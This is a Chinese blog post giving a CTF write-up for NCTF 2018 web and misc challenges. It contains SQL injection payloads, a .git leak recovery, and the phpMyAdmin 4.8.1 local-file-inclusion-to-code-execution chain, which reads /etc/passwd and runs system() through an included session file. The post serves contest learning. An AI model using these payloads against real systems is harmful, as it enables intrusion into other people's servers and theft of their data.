<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">



  <meta name="google-site-verification" content="<!---->">















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="ctf,">







  <script>
  (function(i,s,o,g,r,a,m){i["DaoVoiceObject"]=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;a.charset="utf-8";m.parentNode.insertBefore(a,m)})(window,document,"script",('https:' == document.location.protocol ? 'https:' : 'http:') + "//widget.daovoice.io/widget/0f81ff2f.js","daovoice")
  daovoice('init', {
      app_id: "39f38dce"
    });
  daovoice('update');
  </script>





<meta name="description" content="前言上周末的nctf，自己除了签到也就做出来两道题，然后参考了一些网上师傅们赶出来的writeup整理出这篇博客。 前天和师傅们去做了BCTF的题，ctf从入门到自闭啊，现在只是知道了第一题的思路，其他的还在边看边等大佬们的writeup，所以先写一下今天复盘的nctf了~ 很烦的是我写这篇博客的时候平台服务器坏掉了，我做的时候还有一些没截图 github上的环境师傅们还没传完，我也懒得再搭环境截">
<meta name="keywords" content="ctf">
<meta property="og:type" content="article">
<meta property="og:title" content="NCTF 2018">
<meta property="og:url" content="http://yoursite.com/2018/11/29/NCTF-2018/index.html">
<meta property="og:site_name" content="xiangfeng">
<meta property="og:description" content="前言上周末的nctf，自己除了签到也就做出来两道题，然后参考了一些网上师傅们赶出来的writeup整理出这篇博客。 前天和师傅们去做了BCTF的题，ctf从入门到自闭啊，现在只是知道了第一题的思路，其他的还在边看边等大佬们的writeup，所以先写一下今天复盘的nctf了~ 很烦的是我写这篇博客的时候平台服务器坏掉了，我做的时候还有一些没截图 github上的环境师傅们还没传完，我也懒得再搭环境截">
<meta property="og:locale" content="default">
<meta property="og:image" content="http://yoursite.com/2018/11/29/NCTF-2018/1.jpg">
<meta property="og:image" content="http://yoursite.com/2018/11/29/NCTF-2018/2.jpg">
<meta property="og:image" content="http://yoursite.com/2018/11/29/NCTF-2018/9.jpg">
<meta property="og:image" content="http://yoursite.com/2018/11/29/NCTF-2018/10.jpg">
<meta property="og:image" content="http://yoursite.com/2018/11/29/NCTF-2018/3.jpg">
<meta property="og:image" content="http://yoursite.com/2018/11/29/NCTF-2018/4.jpg">
<meta property="og:image" content="http://yoursite.com/2018/11/29/NCTF-2018/5.jpg">
<meta property="og:image" content="http://yoursite.com/2018/11/29/NCTF-2018/11.jpg">
<meta property="og:image" content="http://yoursite.com/2018/11/29/NCTF-2018/6.jpg">
<meta property="og:image" content="http://yoursite.com/2018/11/29/NCTF-2018/12.png">
<meta property="og:image" content="http://yoursite.com/2018/11/29/NCTF-2018/7.jpg">
<meta property="og:updated_time" content="2018-12-03T08:15:48.202Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="NCTF 2018">
<meta name="twitter:description" content="前言上周末的nctf，自己除了签到也就做出来两道题，然后参考了一些网上师傅们赶出来的writeup整理出这篇博客。 前天和师傅们去做了BCTF的题，ctf从入门到自闭啊，现在只是知道了第一题的思路，其他的还在边看边等大佬们的writeup，所以先写一下今天复盘的nctf了~ 很烦的是我写这篇博客的时候平台服务器坏掉了，我做的时候还有一些没截图 github上的环境师傅们还没传完，我也懒得再搭环境截">
<meta name="twitter:image" content="http://yoursite.com/2018/11/29/NCTF-2018/1.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2018/11/29/NCTF-2018/">





  <title>NCTF 2018 | xiangfeng</title>
  








</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>
<a href="https://github.com/xiangfengw" class="github-corner" aria-label="View source on GitHub"><svg width="80" height="80" viewbox="0 0 250 250" style="fill:#151513; color:#fff; position: absolute; top: 0; border: 0; right: 0;" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"/><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"/><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"/></svg></a><style>.github-corner:hover .octo-arm{animation:octocat-wave 560ms ease-in-out}@keyframes octocat-wave{0%,100%{transform:rotate(0)}20%,60%{transform:rotate(-25deg)}40%,80%{transform:rotate(10deg)}}@media (max-width:500px){.github-corner:hover .octo-arm{animation:none}.github-corner .octo-arm{animation:octocat-wave 560ms ease-in-out}}</style>
    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">xiangfeng</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            About
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            Search
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="Searching..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2018/11/29/NCTF-2018/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="像风">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/head.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="xiangfeng">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">NCTF 2018</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2018-11-29T17:40:07+08:00">
                2018-11-29
              </time>
            

            

            
          </span>

          

          
            
          

          
          
             <span id="/2018/11/29/NCTF-2018/" class="leancloud_visitors" data-flag-title="NCTF 2018">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">Visitors&#58;</span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>上周末的nctf，自己除了签到也就做出来两道题，然后参考了一些网上师傅们赶出来的writeup整理出这篇博客。</p>
<p>前天和师傅们去做了BCTF的题，ctf从入门到自闭啊，现在只是知道了第一题的思路，其他的还在边看边等大佬们的writeup，所以先写一下今天复盘的nctf了~</p>
<p>很烦的是我写这篇博客的时候平台服务器坏掉了，我做的时候还有一些没截图</p>
<p>github上的环境师傅们还没传完，我也懒得再搭环境截图了，我会尽量把学到的知识和思路讲解的清楚一些，大家如果想复现可以到这里找一下环境：<a href="https://github.com/NJUPT-coding-gay/NCTF2018" target="_blank" rel="noopener">传送门</a></p>
<a id="more"></a>
<h1 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h1><h2 id="签到题"><a href="#签到题" class="headerlink" title="签到题"></a>签到题</h2><img src="/2018/11/29/NCTF-2018/1.jpg">
<p>点开链接发现跳到了百度，应该是重定向，burp抓个包重放一下就拿到flag了。</p>
<h2 id="滴！晨跑打卡"><a href="#滴！晨跑打卡" class="headerlink" title="滴！晨跑打卡"></a>滴！晨跑打卡</h2><img src="/2018/11/29/NCTF-2018/2.jpg">
<p>一道sql注入的题，是我做出来的第一道题，这道题闭合一下单引号绕一下空格就可以了，绕空格的一些常见方法如下：</p>
<p><code>%20 %09 %0a %0b %0c %0d %a0 %00 /**/  /*!*/</code></p>
<p>我看网上的师傅们使用%a0绕过的，我当时好像是用%0b绕过的，但是不重要啦</p>
<p>构造回显payload<code>?id=1&#39;%a0union%a0select%a01,2,3%a0and&#39;1&#39;=&#39;1</code></p>
<img src="/2018/11/29/NCTF-2018/9.jpg">
<p>然后就开始常规的通过information_schema爆库爆表爆字段了</p>
<p>最后的payload为 <code>?id=1&#39;%a0union%a0select%a01,(select%a0th1s_1s_flag%a0from%a0flaaaaaaag.f144444444g),3%a0&#39;</code></p>
<img src="/2018/11/29/NCTF-2018/10.jpg">
<h2 id="Go-Lakers"><a href="#Go-Lakers" class="headerlink" title="Go Lakers"></a>Go Lakers</h2><img src="/2018/11/29/NCTF-2018/3.jpg">
<p>这题开始做的有点迷啊，还是余师傅提醒，burp重放之后响应包往下拉了好久看到了提示 <code>&lt;!--post me viewsource--&gt;</code></p>
<p>重放个post变量viewsource拿到了源代码，这里要注意一下改成POST包时要加一个头部字段 <code>Content-type:application/x-www-form-urlencoded</code>，在burp中看响应包会有很多html实体编码和php的代码高亮，这咋看得懂。跟学长学习了放在proxy里面forward一下就显示在浏览器里了，hhh又暴露了自己的菜啊</p>
<p>源码如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">error_reporting(0); </span><br><span class="line">include &apos;getip.php&apos;; </span><br><span class="line">ini_set(&apos;open_basedir&apos;,&apos;.&apos;); </span><br><span class="line">if(isset($_POST[&apos;viewsource&apos;]))&#123;</span><br><span class="line">	highlight_file(__FILE__); </span><br><span class="line">	die(); </span><br><span class="line">&#125; </span><br><span class="line"></span><br><span class="line">mt_srand(mktime()+$seed); </span><br><span class="line"></span><br><span class="line">function de_code($value)&#123; </span><br><span class="line">	$value = base64_decode($value); </span><br><span class="line">	$result = &apos;&apos;; </span><br><span class="line">	for($i=0;$i&lt;strlen($value);$i++)&#123; </span><br><span class="line">		$result .= chr(ord($value[$i])-$i*2); </span><br><span class="line">	&#125; </span><br><span class="line">	return $result; </span><br><span class="line">&#125; </span><br><span class="line"></span><br><span class="line">	if(!(getip() === &apos;127.0.0.1&apos; &amp;&amp; file_get_contents($_GET[&apos;9527&apos;]) === &apos;nctf_is_good&apos; &amp;&amp; mt_rand(1,10000) === intval($_GET[&apos;go_Lakers&apos;])))&#123;</span><br><span class="line">	header(&apos;location:https://bbs.hupu.com/24483652.html?share_from=kqapp&apos;);</span><br><span class="line">    &#125;</span><br><span class="line">   	else&#123; echo &apos;great&apos;; </span><br><span class="line">   	&#125; </span><br><span class="line">   	echo file_get_contents(de_code($_GET[&apos;file_&apos;])); </span><br><span class="line">?&gt;</span><br><span class="line">&lt;!DOCTYPE html&gt; </span><br><span class="line">&lt;html&gt; </span><br><span class="line">&lt;head&gt;&lt;title&gt;嘻嘻嘻&lt;/title&gt;&lt;/head&gt; </span><br><span class="line">&lt;body&gt; </span><br><span class="line">	&lt;h3&gt;题目在哪呢&lt;/h3&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>
<p>这道题我开始的思路是要先满足if的条件，然后才能考虑file_get_contents()函数，不然就被重定向走了，还是问了一下余师傅才知道，这里在burp中follow只是加了个header头，但还是会执行下面的file_get_contents()语句。那就可以直接根据上面的de_code()函数写个编码的脚本就ok辣，要猜到flag藏在flag.php文件中哦。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">function en_code($value)&#123; </span><br><span class="line">	$result = &apos;&apos;; </span><br><span class="line">	for($i=0;$i&lt;strlen($value);$i++)&#123; </span><br><span class="line">		$result .= chr(ord($value[$i])+$i*2); </span><br><span class="line">	&#125; </span><br><span class="line">	$result = base64_encode($result); return $result; </span><br><span class="line">&#125; </span><br><span class="line">echo en_code(&apos;flag.php&apos;); </span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>得到Zm5lbTZ6dH4=，用get传一下拿到flag</p>
<h2 id="全球最大交友网站"><a href="#全球最大交友网站" class="headerlink" title="全球最大交友网站"></a>全球最大交友网站</h2><img src="/2018/11/29/NCTF-2018/4.jpg">
<p>这道题，是 .git 泄露，其实当时想到了，但是中途死于对git的操作一知半解吧</p>
<p>从p神的一篇文章中学习一下git获取源码的利用和原理：<a href="https://www.leavesongs.com/PENETRATION/XDCTF-2015-WEB2-WRITEUP.html" target="_blank" rel="noopener">XDCTF2015代码审计全解</a></p>
<p>我当时进行了第一步操作，利用lijiejie的GitHack：<code>https://github.com/lijiejie/GitHack</code> 脚本获取到了一个readme.md文件，内容为<code>Allsource files areingit tag1.0</code> ，考虑flag会在tag1.0版本中，应该要回滚版本。</p>
<p>在看师傅们writeup的时候发现一个可以将各个版本的源码提取出来的神器：<a href="https://github.com/style-404/Git_Extract" target="_blank" rel="noopener">Git_Extract</a></p>
<p>还有师傅用了 <a href="https://github.com/denny0223/scrabble" target="_blank" rel="noopener">scrabble</a> 脚本</p>
<p><code>git log</code>查看历史版本，<code>git show HEAD 版本号</code> 回滚版本，flag在readme.txt中</p>
<p>这时候我突然想起来之前做cgctf用过的 <a href="https://github.com/kost/dvcs-ripper" target="_blank" rel="noopener">dvcs-ripper</a> 应该也可以吧，但是服务器已经关了没办法尝试了，以后再遇到类似的题再多尝试一下吧</p>
<h2 id="小绿草之最强大脑"><a href="#小绿草之最强大脑" class="headerlink" title="小绿草之最强大脑"></a>小绿草之最强大脑</h2><img src="/2018/11/29/NCTF-2018/5.jpg">
<p>查看源代码得到hint </p>
<img src="/2018/11/29/NCTF-2018/11.jpg">
<p>当时做题时一脸懵逼，源码泄露在哪里。</p>
<p>之后看wp文中师傅说到 “第一反应就是CTF中常有的BAK文件“</p>
<p>访问index.php.bak下载文件</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">if(isset($_SESSION[&apos;ans&apos;]) &amp;&amp; isset($_POST[&apos;ans&apos;]))&#123;</span><br><span class="line"> if(($_SESSION[&apos;ans&apos;])+intval($_POST[&apos;input&apos;])!=$_POST[&apos;ans&apos;])&#123;</span><br><span class="line">  session_destroy();</span><br><span class="line">  echo &apos;</span><br><span class="line">  &lt;script language=&quot;javascript&quot;&gt;  </span><br><span class="line">  alert(&quot;怎么没算对呢？&quot;);  </span><br><span class="line">  window.history.back(-1);  &lt;/script&gt;&apos;;</span><br><span class="line"> &#125;</span><br><span class="line"> else&#123;</span><br><span class="line">  if(intval(time())-$_SESSION[&apos;time&apos;]&lt;1)&#123;</span><br><span class="line">   session_destroy();</span><br><span class="line">   echo &apos;</span><br><span class="line">   &lt;script language=&quot;javascript&quot;&gt;  </span><br><span class="line">   alert(&quot;你手速太快啦，服务器承受不住!!!&quot;);  </span><br><span class="line">   window.history.back(-1); &lt;/script&gt; &apos;;</span><br><span class="line">  &#125;</span><br><span class="line">  if(intval(time())-$_SESSION[&apos;time&apos;]&gt;2)&#123;</span><br><span class="line">   session_destroy();</span><br><span class="line">   echo &apos;</span><br><span class="line">   &lt;script language=&quot;javascript&quot;&gt;  </span><br><span class="line">   alert(&quot;你算的太慢了少年！&quot;);  </span><br><span class="line">   window.history.back(-1); &lt;/script&gt; &apos;;</span><br><span class="line">  &#125;</span><br><span class="line">  echo &apos;</span><br><span class="line">  &lt;script language=&quot;javascript&quot;&gt;  </span><br><span class="line">  alert(&quot;tql，算对了！！&quot;);  </span><br><span class="line">      &lt;/script&gt; &apos;;</span><br><span class="line">  $_SESSION[&apos;count&apos;]++;</span><br><span class="line"> &#125;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>关键信息：</p>
<ul>
<li>input 的变量经过了 php 的<code>intval</code>处理 </li>
<li>计算时间要在 1-2 秒之间 </li>
<li>算对的次数会累加</li>
</ul>
<p>使用了intval函数来防止整数溢出的危害，所以我们输入的大于二十一位的数字经过该函数处理后发生了变化。要注意的是intval()函数在32位机器和64机器上的运行结果也是不一样的。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php echo intval(&apos;4200000000000000000000&apos;);?&gt;</span><br><span class="line">32位系统：2147483647 64位系统：9223372036854775807</span><br></pre></td></tr></table></figure>
<p>改了一下网上的脚本跑出flag</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">import re</span><br><span class="line">import time</span><br><span class="line"></span><br><span class="line">s = requests.Session()  # 保持当前会话的持续有效性</span><br><span class="line">url = &quot;http://ctfgame.acdxvfsvd.net:20004/&quot;</span><br><span class="line">number =&quot;4200000000000000000000&quot;  #输入的数字</span><br><span class="line">r = s.get(url)</span><br><span class="line">math = &apos;&apos;</span><br><span class="line">headers = &#123;</span><br><span class="line">    &apos;Content-Type&apos;: &apos;application/x-www-form-urlencoded&apos;,</span><br><span class="line">    &apos;User-Agent&apos;:&apos;Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0&apos;,</span><br><span class="line">&#125;</span><br><span class="line">while(1):</span><br><span class="line">    pattern =re.compile(r&apos;&lt;div style=&quot;display:inline;&quot;&gt;(.*?)&lt;/div&gt;&apos;)   #构建正则</span><br><span class="line">    num = pattern.findall(r.text)   #正则提取公式</span><br><span class="line">    result = &quot;9223372036854775807&quot;+&apos;+&apos;+math.join(num)[0:-1]  #拼接真实的公式，切片是为了舍去等号</span><br><span class="line">    ans = eval(result)   #利用eval直接来计算结果</span><br><span class="line">    </span><br><span class="line">    data = &#123;</span><br><span class="line">        &apos;input&apos;:&apos;4200000000000000000000&apos;,</span><br><span class="line">        &apos;ans&apos;:ans</span><br><span class="line">    &#125;</span><br><span class="line">    r = s.post(url,headers=headers,data=data)</span><br><span class="line">    time.sleep(1.5)   #延时1.5秒</span><br><span class="line">    print(r.text)</span><br></pre></td></tr></table></figure>
<h2 id="基本操作"><a href="#基本操作" class="headerlink" title="基本操作"></a>基本操作</h2><img src="/2018/11/29/NCTF-2018/6.jpg">
<p>给了一个phpMyAdmin的网址，这题学到了phpMyAdmin本地文件包含漏洞</p>
<p>2018-06-21 ChaMd5安全团队公开了一个<a href="https://mp.weixin.qq.com/s?__biz=MzIzMTc1MjExOQ==&amp;mid=2247485036&amp;idx=1&amp;sn=8e9647906c5d94f72564dec5bc51a2ab&amp;chksm=e89e2eb4dfe9a7a28bff2efebb5b2723782dab660acff074c3f18c9e7dca924abdf3da618fb4&amp;mpshare=1&amp;scene=1&amp;srcid=0621gAv1FMtrgoahD01psMZr&amp;pass_ticket=LqhRfckPxAVG2dF%2FjxV%2F9%2FcEb5pShRgewJe%2FttJn2gIlIyGF%2FbsgGmzcbsV%2BLmMK#rd" target="_blank" rel="noopener">phpMyAdmin 4.8.1后台getshell</a>，该漏洞利用不要求root帐号，只需能够登录 phpMyAdmin 便能够利用。</p>
<p>查看页面源代码发现Mysql版本是4.8.1，登录的账号密码是网上的弱口令组合guest+guest</p>
<p>这种文件包含漏洞可以读取任意文件，首先要知道在URL编码中%3f是用于分割实际URL和参数的 ，先判断一下根目录的位置为<code>../../../../</code>，但实际操作时发现，就算多加了几个../也没有关系，因为到根目录就没法继续往上了。</p>
<p>构建url： <code>http://ctfgame.acdxvfsvd.net:20006/index.php?target=db_sql.php%253f/../../../../etc/passwd</code>出现如下图回显验证该漏洞存在</p>
<img src="/2018/11/29/NCTF-2018/12.png">
<p>我们知道phpMyAdmin默认自带phpinfo文件，访问 </p>
<p>访问 <code>http://ctfgame.acdxvfsvd.net:20006/index.php?target=db_sql.php%253f/../info.php</code> </p>
<p>有一栏叫做”session_save_path”，这一项是专门用来保存session的路径的。而我们这道题就是通过本地文件包含session来读取sql执行语句中插入php代码，让本地文件包含的时候执行php语句。 </p>
<p>session文件名默认为session_你的sessionid，sessionid就是你在浏览器中cookie的phpmyadmin的值，这里session日志的保存路径是/tmp/sess_你的sessionid</p>
<p>在phpMyAdmin中执行sql语句 <code>select &#39;&lt;?php system(&quot;ls&quot;);?&gt;;&#39;</code></p>
<p>再访问<code>http://ctfgame.acdxvfsvd.net:20006/index.php?target=db_sql.php%253f/../../../../temp/xxxxxx</code>可以执行系统命令并得到回显</p>
<p>通过一系列的<code>ls</code>查找到可疑文件<code>nctfffffffff</code></p>
<p>最后的payload<code>select &#39;&lt;?php system(&quot;cd /&amp;&amp;cat nctfffffffff&quot;);?&gt;;&#39;</code></p>
<p>对phpMyAdmin 4.8.x本地文件包含利用的漏洞，我参考了VulnSpy的<a href="http://www.vulnspy.com/phpmyadmin-4.8.1/phpmyadmin_4.8.1_lfi_to_rce_vulnerability/#M-yKH6TajZ4FQiZwKabDXpThky34kEerbp" target="_blank" rel="noopener">在线环境</a></p>
<h1 id="Misc"><a href="#Misc" class="headerlink" title="Misc"></a>Misc</h1><h2 id="CalcNow"><a href="#CalcNow" class="headerlink" title="CalcNow"></a>CalcNow</h2><img src="/2018/11/29/NCTF-2018/7.jpg">
<p>这道题学习了python的pwn库的使用，参考这篇 <a href="http://brieflyx.me/2015/python-module/pwntools-intro/" target="_blank" rel="noopener">Exploit利器——Pwntools</a></p>
<p>要注意的是这个库对windows支持蛮不友好的，我直接在kali里用了</p>
<p>nc连接之后会显示一个要计算的表达式，要求两秒内算出，这题nc连接后回显的内容忘截图了，直接看脚本吧</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">#!/user/bin/enc python</span><br><span class="line">from pwn import *</span><br><span class="line">result=0</span><br><span class="line">a = remote(&quot;ctfgame.acdxvfsvd.net&quot;,30003)</span><br><span class="line">a.recvuntil(&quot;Your Token:\n&quot;)</span><br><span class="line">a.sendline(&quot;hqd5NgJ5tr0ObfJliY0vsiZHahw3epkr&quot;)</span><br><span class="line">a.recvuntil(&quot;Before becoming a PWNer, you should know how to write script\n&quot;)</span><br><span class="line">a.recvuntil(&quot;Tools: python module -&gt; pwntools(sudo pip install pwn)/SOCKET/zio...\n&quot;)</span><br><span class="line">calc_str = a.recv(1024)</span><br><span class="line">number1 = calc_str[:25]</span><br><span class="line">iterator = calc_str[26:29]</span><br><span class="line">number2 = calc_str[30:].replace(&quot; &quot;,&quot;&quot;)</span><br><span class="line">print number1+iterator+number2</span><br><span class="line">if(iterator==&apos;add&apos;):</span><br><span class="line">	result = int(number1) + int(number2)</span><br><span class="line">if(iterator==&apos;sub&apos;):</span><br><span class="line">	result = int(number1) - int(number2)</span><br><span class="line">print result</span><br><span class="line">a.sendline(str(result))</span><br><span class="line">s = a.recvrepeat()</span><br><span class="line">print s</span><br></pre></td></tr></table></figure>
<h1 id="后记"><a href="#后记" class="headerlink" title="后记"></a>后记</h1><p>现在是零点了，还想看看python，太菜了就少睡点觉吧！</p>
